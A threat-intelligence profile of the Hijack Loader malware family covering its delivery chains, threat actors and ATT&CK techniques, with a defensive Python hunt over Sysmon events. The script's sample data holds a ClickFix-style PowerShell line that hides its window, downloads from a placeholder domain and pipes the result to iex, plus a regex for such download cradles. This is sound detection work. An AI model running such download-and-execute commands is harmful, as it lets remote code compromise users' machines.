Hijack Loader
Hijack Loader is a modular Windows malware loader, also tracked as DOILoader and IDAT Loader, that serves as a conduit for follow-on payloads including information stealers and remote access trojans. Reported second-stage malware delivered via Hijack Loader includes Rhadamanthys, Lumma Stealer, RedLine Stealer, Atomic Stealer, ACR Stealer, and Remcos RAT.

In one described chain, a DLL decrypts embedded data, reconstructs the Hijack Loader payload in memory, and injects shellcode into a newly spawned process; another report states that RenEngine Loader decrypts, stages, and transfers execution to Hijack Loader. The malware has been described as signed with legitimate code-signing certificates to evade detection, and campaigns involving it have used in-memory reconstruction, DLL side-loading, module stomping, process injection, and scheduled-task persistence.
Observed delivery vectors include compromised websites (including those running the ClearFake framework), ClickFix-style fake CAPTCHA and troubleshooting lures, SEO poisoning, malicious installers, pirated or cracked software lures, and compromised YouTube channels. ClearFake campaigns delivered Hijack Loader to Windows systems, and separate ClickFix campaigns used Hijack Loader to drop RedLine Stealer. The GPUGate campaign used a malicious installer aimed at users searching for developer tools to deliver Hijack Loader and Atomic Stealer. Compromised YouTube accounts advertised cracked software such as Adobe Photoshop via MSI installers that deployed Hijack Loader and then Rhadamanthys. The malware has also appeared in campaigns using fake Cloudflare CAPTCHA pages and in CastleLoader-related ecosystems.
Public reporting links Hijack Loader to multiple threat actors and operations. It was targeted in the May 2025 Operation Endgame law-enforcement action. A Russia-aligned threat actor tracked as UAC-0184 / Hive0156 used Viber-delivered spearphishing against Ukrainian military and government entities, including the Verkhovna Rada, with weaponized ZIP archives containing malicious LNK files that ultimately deployed Hijack Loader and then Remcos RAT. In that activity, legitimate executables such as CFlux.exe and Chime.exe were abused for DLL side-loading, and Remcos RAT was injected into Chime.exe. Hijack Loader is also used broadly by criminal actors in campaigns distributing stealers and RATs across Windows environments.
High-confidence behavioral details include: use as a secondary or intermediate loader; decryption and staging of payloads in memory; shellcode injection into spawned processes; deployment of Remcos RAT via injection into Chime.exe; environmental checks for security software in at least one campaign; and persistence via scheduled tasks. This summary lists no standalone network indicators or hashes.
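As an added example (not Mallory's or any vendor's code), the following Python hunt encodes three of the behaviors described above as heuristics over Sysmon-style process-creation (Event 1) and image-load (Event 7) records: a legitimate-looking EXE running from a user-writable directory that loads an unsigned DLL beside itself (the CFlux.exe/Chime.exe side-loading shape), schtasks.exe creating a task whose action lives under a user-writable path, and explorer.exe launching a script interpreter with a download or hidden-window argument (a ClickFix-style execution). The event records, directory and interpreter lists, the DLL name and the domain are constructed for the example; the thresholds are a starting point to tune against your own telemetry, not vendor signatures.

```python
import re
from pathlib import PureWindowsPath

# Directories an unprivileged user can write to (assumption: illustrative list).
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\programdata\\", "\\users\\public\\")
# Legitimate binaries named in the UAC-0184 reporting as side-loading hosts.
KNOWN_SIDELOAD_HOSTS = {"cflux.exe", "chime.exe"}
# Interpreters a ClickFix-style lure typically has the victim launch (assumption).
CLICKFIX_CHILDREN = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
# Download cradle / hidden-window markers commonly pasted by the victim (assumption).
CLICKFIX_CMD = re.compile(
    r"(invoke-webrequest|\biwr\b|downloadstring|\bcurl\b|-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s)",
    re.I,
)

def in_user_writable(path: str) -> bool:
    p = path.lower()
    return any(marker in p for marker in USER_WRITABLE)

def rule_dll_sideload(ev):
    """Event 7: EXE in a user-writable directory loads an unsigned DLL from its own directory."""
    if ev.get("EventID") != 7:
        return None
    image, dll = ev["Image"], ev["ImageLoaded"]
    same_dir = PureWindowsPath(image).parent == PureWindowsPath(dll).parent  # case-insensitive
    unsigned_dll = ev.get("Signed", "false").lower() != "true"
    if same_dir and unsigned_dll and in_user_writable(image):
        host = PureWindowsPath(image).name.lower()
        severity = "high" if host in KNOWN_SIDELOAD_HOSTS else "medium"
        return {"rule": "dll_sideload", "severity": severity, "host": host, "dll": dll}
    return None

def rule_schtasks_persistence(ev):
    """Event 1: schtasks /create whose /tr action points into a user-writable path."""
    if ev.get("EventID") != 1 or PureWindowsPath(ev["Image"]).name.lower() != "schtasks.exe":
        return None
    cmd = ev.get("CommandLine", "")
    if not re.search(r"/create\b", cmd, re.I):
        return None
    m = re.search(r'/tr\s+(?:"([^"]+)"|(\S+))', cmd, re.I)  # quoted or bare action path
    target = (m.group(1) or m.group(2)) if m else ""
    if target and in_user_writable(target):
        return {"rule": "schtasks_persistence", "severity": "medium", "target": target}
    return None

def rule_clickfix_execution(ev):
    """Event 1: explorer.exe (Run dialog / shell) spawns an interpreter with a cradle or hidden window."""
    if ev.get("EventID") != 1:
        return None
    parent = PureWindowsPath(ev.get("ParentImage", "")).name.lower()
    child = PureWindowsPath(ev["Image"]).name.lower()
    if parent == "explorer.exe" and child in CLICKFIX_CHILDREN and CLICKFIX_CMD.search(ev.get("CommandLine", "")):
        return {"rule": "clickfix_execution", "severity": "high", "child": child}
    return None

RULES = (rule_dll_sideload, rule_schtasks_persistence, rule_clickfix_execution)

def hunt(events):
    """Run every rule over every event; return the list of hits in event order."""
    hits = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                hit["pid"] = ev.get("ProcessId")
                hits.append(hit)
    return hits

# Constructed sample telemetry: two true positives per page behaviour, paired with benign lookalikes.
SAMPLE_EVENTS = [
    {"EventID": 7, "ProcessId": 4120, "Image": r"C:\Users\victim\AppData\Local\Temp\7z\CFlux.exe",
     "ImageLoaded": r"C:\Users\victim\AppData\Local\Temp\7z\example.dll", "Signed": "false"},  # example.dll is constructed
    {"EventID": 7, "ProcessId": 5012, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ImageLoaded": r"C:\Program Files\Google\Chrome\Application\chrome_elf.dll", "Signed": "true"},
    {"EventID": 1, "ProcessId": 4188, "Image": r"C:\Windows\System32\schtasks.exe", "ParentImage": r"C:\Users\victim\AppData\Local\Temp\7z\CFlux.exe",
     "CommandLine": r'schtasks.exe /create /tn "Update" /tr "C:\Users\victim\AppData\Roaming\svc\updater.exe" /sc onlogon'},
    {"EventID": 1, "ProcessId": 2200, "Image": r"C:\Windows\System32\schtasks.exe", "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r'schtasks.exe /create /tn "Agent" /tr "C:\Program Files\Vendor\agent.exe" /sc daily'},
    {"EventID": 1, "ProcessId": 6044, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell.exe -w hidden -c "iwr http://captcha.example.invalid/verify | iex"'},  # constructed domain
    {"EventID": 1, "ProcessId": 6100, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -c Get-Process"},
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit)
```

The side-loading rule deliberately keys on directory and signature state rather than a DLL name list, because the reporting above does not name the side-loaded DLL; swap `USER_WRITABLE` for your own staging-directory inventory and promote `KNOWN_SIDELOAD_HOSTS` from a set to a lookup of binaries that are signed but have no business running outside Program Files.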
Groups observed using it
1 distinct threat actor attributed by public researchers.
Credential Theft and Remote Access Surge as AllaKore, PureRAT, and Hijack Loader Proliferate
Techniques & procedures
8 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 technique: "creates a throwaway GitHub account and forks… edits the download link… used sponsored ads… to promote their commit… deliver Hijack Loader and Atomic Stealer."
Initial Access
1 technique: ClearFake is a malicious JavaScript framework deployed on compromised websites to deliver malware through the drive-by download technique.
Execution
1 technique: "Victims are prompted to download and run a fake application..." and "instructions ... urges targets to run an executable file ("setup.exe")"
Stealth
3 techniques: "distributed via a heavily obfuscated Inno Setup installer"; "Delivered via a downloader in a ZIP archive"; "illegally modified game installers distributed via piracy platforms"
"threat actors are exploiting the situation to distribute Remcos RAT ... under the guise of providing a hotfix" and "phishing email impersonating CrowdStrike recruitment"
Discovery
1 technique
Command and Control
1 technique: "distributing a ZIP archive file named 'crowdstrike-hotfix.zip,' which contains a malware loader..."
Other
1 technique
IOCs tracked for this family
3 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
IPs, domains, and DNS infrastructure linked to this family.
Recent activity
18 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Multi-stage loader delivered via a repo-squatting / Google Ads campaign (GPUGate) using a trojanized installer.
Secondary-stage loader used in RenEngine Loader campaigns to ultimately deploy Lumma Stealer.
Loader referenced as proliferating in campaigns targeting Mexican organizations (per summary).
Malware loader updated with call stack spoofing and other evasion/persistence features (as described).